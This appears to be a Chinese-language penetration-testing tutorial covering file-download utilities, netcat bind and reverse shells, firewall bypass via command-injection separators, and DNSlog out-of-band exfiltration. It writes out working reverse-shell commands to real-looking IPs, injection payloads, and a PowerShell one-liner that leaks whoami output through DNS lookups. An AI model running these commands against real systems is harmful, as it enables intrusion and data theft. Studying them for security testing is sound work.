目录
常规基本渗透命令
文件上传下载-解决无图形化&解决数据传输
反弹Shell命令-解决数据回显&解决数据通讯
防火墙绕过-正向连接&反向连接&内网服务器
防火墙组合数据不回显-ICMP带外查询Dnslog
思维导图
章节知识点:
应用架构:Web/APP/云应用/三方服务/负载均衡等
安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等
渗透命令:文件上传下载/端口服务/Shell反弹等
抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等
算法加密:数据编码/密码算法/密码保护/反编译/加壳
常规基本渗透命令
需要掌握基本的Linux,CMD,POWERSHELL命令
【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇 渗透测试中常用的命令-CSDN博客
文件上传下载-解决无图形化&解决数据传输
文件下载命令生成:[~]#棱角 ::Edge.Forum*
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
反弹Shell命令-解决数据回显&解决数据通讯
反弹命令在线生成;[~]#棱角 ::Edge.Forum*
NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。
正向连接-Linux(控制机)控制Windows(被控制机)
# Windows绑定CMD到本地5566端口
nc -e cmd -lvvp 5566
# Linux主动连接目标5566
nc 10.10.10.1 5566
正向连接-Windows(控制机)控制Linux(被控制机)
# Linux绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
# Windows主动连接目标5566
nc 10.10.10.1 5566
反向连接-Linux(被控制机)反向连接Windows(控制机)
# linux反弹windows上
ncat -e /bin/sh x.x.x.x 5566
# Windows等待5566连接
nc -lvvp 5566
反向连接-Windows(被控制机)反向连接Linux(控制机)
# windows 反弹linux
nc -e cmd 10.10.10.146 5566 windows 反弹linux
# Linux等待5566连接
ncat -lvvp 5566
防火墙绕过-正向连接&反向连接&内网服务器
Windows防火墙规则:
入站:规则严格,规则设置允许才能通过
- 出战:宽松,没有禁止就可以通过
管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && ``(特有``和;)
``可以包含命令并执行
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 `whoami
- 判断目标系统类型
-
windows没有自带的nc,想办法上传nc 反弹权限
-
反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接
防火墙组合数据不回显-ICMP带外查询Dnslog
如果防火墙规则限制严格,入/出站都做了严格限制,只允许特定的服务医用通过,有漏洞数据不回显,可以把数据隐藏在ICMP协议中外带出去
绕过原理:ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。
DNS平台:DNSLog Platform
ping 127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='5t4zre.dnslog.cn';$z=$x+$y;ping $z
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行
powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z
127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z